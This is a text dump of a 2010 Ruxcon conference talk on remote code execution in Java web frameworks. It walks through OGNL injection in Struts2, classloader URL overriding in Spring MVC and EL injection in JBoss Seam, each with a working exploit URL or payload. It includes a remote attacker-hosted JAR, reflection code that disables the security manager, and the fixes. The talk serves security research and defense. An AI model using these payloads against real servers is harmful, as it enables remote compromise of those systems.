view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon

Milking a horseorexecuting remote code inmodern Java frameworksMeder Kydyraliev, Ruxcon 2010blog.o0o.nuThursday, November 25, 2010

...if you thought that neitherwas possible, you were wrongThursday, November 25, 2010

kumys is a fermented dairy producttraditionally made from mare’s milk bynomads of Central asiaThursday, November 25, 2010

Thursday, November 25, 2010http://en.wikipedia.org/wiki/File:Mare_milking_Suusamyr.jpg CC-BY-SA

Thursday, November 25, 2010...back to security

Evolution of web frameworksThursday, November 25, 2010

Plain old servletpublic class MyServlet extends HttpServlet {public void doGet (HttpServletRequest req,HttpServletResponse res)throws ServletException, IOException {PrintWriter out = res.getWriter();String name = req.getParameter("name");out.println("Hello, " + name + ". How are you?");out.close();}}Thursday, November 25, 2010

Separation of controller and view}public void doGet (HttpServletRequest req,HttpServletResponse res)throws ServletException, IOException {int userId = Integer.parseInt(req.getParameter("uid"));User user = lookupUser(userId);req.setAttribute("user", user);hello.jsp:...Hello, . How are you?Thursday, November 25, 2010

Problemsa lot of verbose boilerplate codetype conversion (including lists, arrays, etc)input validationobject creation (calling setters/getters manually)early frameworks/libraries asked to extend classes andimplement interfaceslots of XML configuration filesThursday, November 25, 2010

Hey, let us take care of theboilerplate code. You write POJOs, wedo the rest.Thursday, November 25, 2010

user code complexityframework code complexityThursday, November 25, 2010

AOPStrutsJSPEJBJMX RichfacesJSFJAXSeamGuiceJSTLORMOSGiWebWorkJCABeansHibernateXworkJMSPagelets OXMDWRGroovyFaceletsThursday, November 25, 2010

How secure are these Java frameworks?Thursday, November 25, 2010

Previous vulnerabilitiesStruts/Xworkbunch of XSS bugsdirectory traversal (CVE-2008-6505)command execution through input validation (CVE-2007-4556)Spring frameworkremote regexp DoS (CVE-2009-1190)Thursday, November 25, 2010

ApproachUse IDE (e.g. IntelliJ IDEA) for easier navigationDependency injectionDebugging: breakpoints, stepping, etcUse sample apps provided with frameworkEnsures better coverageTook about 5 man-days to find and exploit each bugThursday, November 25, 2010

Look at how frameworkimplements its magicThursday, November 25, 2010

Look at how frameworkimplements its magicThursday, November 25, 2010

Thursday, November 25, 2010Apache Struts2

Nifty featuresRich taglibrary (e.g. AJAXy tags):OGNL:Tags:HTTP parameters:user.address.city = BishkekThursday, November 25, 2010

Nifty featuresuser.address.city = Bishkek#session.user.usernameThursday, November 25, 2010

Nifty featuresuser.address.city = Bishkek#session.user.usernameaction.getUser().getAddress().setCity(“Bishkek”)ActionContext.getContext().getSession().get(“username”)Thursday, November 25, 2010

OGNL(Object Graph Navigation Language)ANTLR-based parserFeatures:Properties setting/getting:foo.bar=baz becomes action.getFoo().setBar(“baz”)Method calling:foo() and @java.lang.System@exit(1)Constructor calling: new MyClass()Ability to save arbitrary objects in OGNL context:#foo = new MyClass()Thursday, November 25, 2010

HTTP parameters == OGNL statementsWhat prevents attacker from doing the following?http://victim/foo?@java.lang.System@exit(1)=mehThursday, November 25, 2010

HTTP parameters == OGNL statementsWhat prevents attacker from doing the following?http://victim/foo?@java.lang.System@exit(1)=mehMethod execution is guarded by:OgnlContext‘s propertyxwork.MethodAccessor.denyMethodExecutionSecurityMemberAccess private fieldallowStaticMethodAccessThursday, November 25, 2010

CVE-2010-1870Based on my previous bug: XW-641# denotes references to variables in OGNLSpecial OGNL variables:#application#session#root#request#parameters#attrParametersInterceptor blacklists # to prevent tamperingwith server-side dataThursday, November 25, 2010

XW-641('\u0023' + 'session[\'user\']')(unused)=0wn3dThursday, November 25, 2010

XW-641('\u0023' + 'session[\'user\']')(unused)=0wn3dThursday, November 25, 2010

XW-641('\u0023' + 'session[\'user\']')(unused)=0wn3d#session['user']=0wn3dThursday, November 25, 2010

XW-641('\u0023' + 'session[\'user\']')(unused)=0wn3d#session['user']=0wn3dActionContext.getContext().getSession().put(“user”, “0wn3d”)Thursday, November 25, 2010

Thursday, November 25, 2010XW-641 fix was to clear the value stack

CVE-2010-1870There are actually more special variables available:#context#_memberAccess#root#this#_typeResolver#_classResolver#_traceEvaluations#_lastEvaluation#_keepLastEvaluationThursday, November 25, 2010

CVE-2010-1870#context- OgnlContext, the one guarding method executionusing xwork.MethodAccessor.denyMethodExecutionproperty#_memberAccess- SecurityMemberAccess guardingmethod execution with allowStaticAccess private fieldThursday, November 25, 2010

CVE-2010-1870#context[‘xwork.MethodAccessor.denyMethodExecution’] = false#_memberAccess[‘allowStatcMemberAccess’] = trueThursday, November 25, 2010

CVE-2010-1870 exploitThursday, November 25, 2010

CVE-2010-1870 exploit#_memberAccess[‘allowStaticMethodAccess’] = trueThursday, November 25, 2010

CVE-2010-1870 exploit#_memberAccess[‘allowStaticMethodAccess’] = true#foo = new java.lang.Boolean(“false”)Thursday, November 25, 2010

CVE-2010-1870 exploit#_memberAccess[‘allowStaticMethodAccess’] = true#foo = new java.lang.Boolean(“false”)#context[‘xwork.MethodAccessor.denyMethodExecution’] = #fooThursday, November 25, 2010

CVE-2010-1870 exploit#_memberAccess[‘allowStaticMethodAccess’] = true#foo = new java.lang.Boolean(“false”)#context[‘xwork.MethodAccessor.denyMethodExecution’] = #foo#rt = @java.lang.Runtime@getRuntime()Thursday, November 25, 2010

CVE-2010-1870 exploit#_memberAccess[‘allowStaticMethodAccess’] = true#foo = new java.lang.Boolean(“false”)#context[‘xwork.MethodAccessor.denyMethodExecution’] = #foo#rt = @java.lang.Runtime@getRuntime()#rt.exec(“touch /tmp/KUMYS”, null)Thursday, November 25, 2010

CVE-2010-1870 exploit/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(ssss)((\u0023rt\u003d@java.lang.Runtime@getRuntime())(\u0023rt.exec('mkdir\u0020/tmp/PWNED'\u002cnull)))=1Thursday, November 25, 2010

CVE-2010-1870 fix2.2.1 fixes vulnerability (~3 months)Work around is either:whitelist A-z0-9_[].’use “params” interceptor’s excludeParams parameterto blacklist:\u ( )Thursday, November 25, 2010

Thursday, November 25, 2010Spring MVC

SpringSpring MVC is Spring’s web frameworkuses Java Beans API (java.beans.*)A lot of components (AOP, etc)Thursday, November 25, 2010

java.beans.IntrospectorFollowing API return bean information about specifiedclass (properties, setter/getter methods, etc):BeanInfo getBeanInfo(Class beanClass);BeanInfo getBeanInfo(Class beanClass,Class stopClass);Thursday, November 25, 2010

BeanInfo getBeanInfo(Class beanClass);HTTP parameters: firstName=Tavis&lastName=Ormandyclass Person {private String firstName;private String lastName;public String getFirstName();public String getLastName();}public void setFirstName(String);public void setLastName(String);Thursday, November 25, 2010

Introspector.getBeanInfo(Person);firstNamelastNameThursday, November 25, 2010

Introspector.getBeanInfo(Person);firstNamelastNameclassThursday, November 25, 2010

Introspector.getBeanInfo(Person);firstNamelastNameclassPerson.classObject.classThursday, November 25, 2010

Introspector.getBeanInfo(Person);firstNamelastNameclassclassLoaderjarPathantiJARLockingworkDirURLs[0] = file:///www/WEB-INF/lib[1] = file:///www/tomcat/libThursday, November 25, 2010

CVE-2010-1622Incorrect usage of Beans API exposesorg.apache.catalina.loader.WebAppClassloader’sURL paths:class.classLoader.URLs[0]=file:///tmp/Overridden path isn’t used to resolve classesBut Jasper (Apache’s JSP engine) uses overridenpaths to resolve JSP tag libraries (TLD)Thursday, November 25, 2010

CVE-2010-1622Two problems:How do we execute code using TLD file?How do we suppy attacker controlled TLD remotely?Thursday, November 25, 2010

Executing code via TLDTLD file defines which classes handle custom tags:Instead of classes it’s possible to specify tag files:input/META-INF/tags/InputTag.tagThursday, November 25, 2010

InputTag.tagThursday, November 25, 2010

How do we supply TLD andtag files remotely?Jasper uses java.net.URL to scan JARsjava.net.URL automatically handles remote JAR URLs:jar:http://attacker/spring-form.jar!/Tag files are retrieved from the same JAR!!!Thursday, November 25, 2010

CVE-2010-1622 exploitDownload org.springframework.web.servlet-X.X.X.RELEASE.jarEdit spring-form.tld and add tag file definitions for all tags. Example for tag:input/META-INF/tags/InputTag.tagCreate corresponding tag files, e.g. InputTag.tag:Bundle everything back into spring-form.jar and put it up onlineSubmit POST request to a form controller with the following parameter:class.classLoader.URLs[0]=jar:http://attacker/spring-form.jar!/Thursday, November 25, 2010

CVE-2010-1622 fixProper fix is to use Introspector API correctly andspecify the stop class:Introspector.getBeanInfo(Person.class, Object.class);Other projects may be vulnerable to this bug too.Spring disallows access to class.classLoaderFixed in the following versions:Spring Framework 3.0.3/2.5.6.SEC02/2.5.7.SR01Thursday, November 25, 2010

Thursday, November 25, 2010JBoss Seam

Java Reflection 1011: String strInstance = "HITB KUL 2010";2: Class clz = Class.forName("java.lang.String");3: Method lenMethod = clz.getDeclaredMethod("length",new Class[] {});4: int strlen = (Integer) lenMethod.invoke(strInstance,new Object[] {});Thursday, November 25, 2010

JBoss SeamCombines EJB3 with JSFPOJOs + annotationsJBoss Unified Expression LanguageThursday, November 25, 2010

JBoss ELFormat: #{expression}Supports method calling: #{object.method()}Various predefined variables: request, session, etc.Container indexing support: #{foo()[123]}Projection (iteration): #{company.departments.{d|d.name}}Thursday, November 25, 2010

CVE-2010-1871Special HTTP parameter controlled where browsershould be redirected after an action (actionOutcome)If supplied URL started with / and contained HTTPparameters all JBoss EL expressions in parametervalues are executed:#{expr}Thursday, November 25, 2010

CVE-2010-1871Special HTTP parameter controlled where browsershould be redirected after an action (actionOutcome)If supplied URL started with / and contained HTTPparameters all JBoss EL expressions in parametervalues are executed:%23{expr}Thursday, November 25, 2010

CVE-2010-1871Special HTTP parameter controlled where browsershould be redirected after an action (actionOutcome)If supplied URL started with / and contained HTTPparameters all JBoss EL expressions in parametervalues are executed:pwned%3d%23{expr}Thursday, November 25, 2010

CVE-2010-1871Special HTTP parameter controlled where browsershould be redirected after an action (actionOutcome)If supplied URL started with / and contained HTTPparameters all JBoss EL expressions in parametervalues are executed:/seam?actionOutcome=/p.xhtml%3fpwned%3d%23{expr}Thursday, November 25, 2010

CVE-2010-1871 exploitHow to execute OS commands via JBoss EL?can’t reference java.lang.Runtime directly, sinceresolvers won’t know how to resolve ‘java’Reflection!!!Every Object has Class getClass()And Class has Class forName(String), whichreturns class based on supplied name:view.getClass.forName('java.lang.Runtime')Thursday, November 25, 2010

CVE-2010-1871 exploitview.getClass.forName('java.lang.Runtime')Thursday, November 25, 2010

CVE-2010-1871 exploitview.getClass.forName('java.lang.Runtime').getDeclaredMethods()Thursday, November 25, 2010

CVE-2010-1871 exploitview.getClass.forName('java.lang.Runtime')java.lang.reflect.Method[].getDeclaredMethods()Thursday, November 25, 2010

CVE-2010-1871 exploitview.getClass.forName('java.lang.Runtime')java.lang.reflect.Method[] .getDeclaredMethods() [19]Thursday, November 25, 2010

CVE-2010-1871 exploitview.getClass.forName('java.lang.Runtime')java.lang.reflect.Method[] .getDeclaredMethods() [19].invoke()Thursday, November 25, 2010

CVE-2010-1871 exploitTo call java.lang.Runtime.exec() we need to:obtain java.lang.Runtime reference via staticreflection call to Runtime.getRuntime(), by finding itsindex in the array returned byClass.getDeclaredMethods()pass the above reference to Runtime.exec()reflection call, which we also invoke by its indexThursday, November 25, 2010

How do we get method’s index?/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19]}Thursday, November 25, 2010

How do we get method’s index?/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19]}/seam-booking/pwn.xhtml?pwned=public+java.lang.Process+java.lang.Runtime.exec(java.lang.String)+throws+java.io.IOException&cid=21Thursday, November 25, 2010

CVE-2010-1871 exploitview.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'mkdir /tmp/PWNED')Thursday, November 25, 2010

CVE-2010-1871 exploitMethod for Runtime.exec(String)view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'mkdir /tmp/PWNED')Method for Runtime.getRuntime()Thursday, November 25, 2010

CVE-2010-1871 exploitMethod for Runtime.exec(String)view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'mkdir /tmp/PWNED')Method for Runtime.getRuntime()Thursday, November 25, 2010

CVE-2010-1871 exploit/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null), 'mkdir /tmp/PWNED')}Thursday, November 25, 2010

Thursday, November 25, 2010Demo

Thursday, November 25, 2010

complexJava web frameworks areand are boundto have morebugsThursday, November 25, 2010


But Java hopethere’s Security ManagerThursday, November 25, 2010

What’s Java security manager?Singleton with a bunch of checkXXX() methodsVarious classes in JRE (e.g. File, Socket, etc) have acheck similar to the following:SecurityManager security = System.getSecurityManager();if (security != null) {security.checkXXX(argument, ...);}Thursday, November 25, 2010

java.lang.ProcessBuilder...SecurityManager security = System.getSecurityManager();if (security != null)security.checkExec(prog);...Thursday, November 25, 2010

Thursday, November 25, 2010Are you using Java security manager?

Are you using Java security manager?207NoYesThursday, November 25, 2010

Why is nobody’s using it?Thursday, November 25, 2010

ProblemsOriginally designed to run untrusted code, not preventvulnerabilitiesPerformance. Security manager calls happen on:getting class loader, creating class loadercalling setAccessible() or getting declared members (used by reflection)getting system properties, env varsgetting java.util.logging.LoggerPermissions are assigned based on paths or entitiesthat signed JARsThursday, November 25, 2010

Problems (cont.)Support for privileged blockscode with higher permissions can use doPrivilegedAPI to grant it’s permissions to the callersSami Koivu’s bugsThursday, November 25, 2010

How do we solve these?Create a custom Java security manager, which:will NOT care about classloaders, reflection* and propertieswill NOT care about doPrivileged blocks, protectiondomains or code sourceswill care about:file access (read, write, exec)socket accessgetDeclaredField/setAccessible* reflection callswill support per class permissions by examining stackThursday, November 25, 2010

How do we solve these?*Thursday, November 25, 2010

Reflection*Reflection can be used to disable any securitymanager:Field security = System.class.getDeclaredField("security");security.setAccessible(true);security.set(null, null);Thursday, November 25, 2010

ProsWill address some of the performance concernsWill be more flexible in permission assignment (perclass permissions)Will be able to detect and prevent seriousvulnerabilities:Path traversal bugsCommand execution bugsExternam XML entity inclusion bugsThursday, November 25, 2010

ConsWill not prevent custom application code abuse:BankTransacation t = new BankTransaction();t.setAccFrom(“123”);t.setAccTo(“Attacker’s account”):t.setAmount(1000000);t.commit()Policy will have to grant privileges to JRE files (which istransparent otherwise due to doPrivileged blocks)Thursday, November 25, 2010

Where’s the code?Alpha version will be released at:http://code.google.com/p/manas-java-security/Thursday, November 25, 2010

Ideas for youJava web frameworks have been ignored for a longtimeCurrent support for bytecode instrumentation(BCI) viaJava agents (ClassFileTransformer API) shouldlet youimplement dynamic taint propagationinstrument String to always return true for indexOf(),contains(), etc methods to find magic charactersThursday, November 25, 2010


Thursday, November 25, 2010?

view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon

Create successful ePaper yourself

Delete template?

Save as template?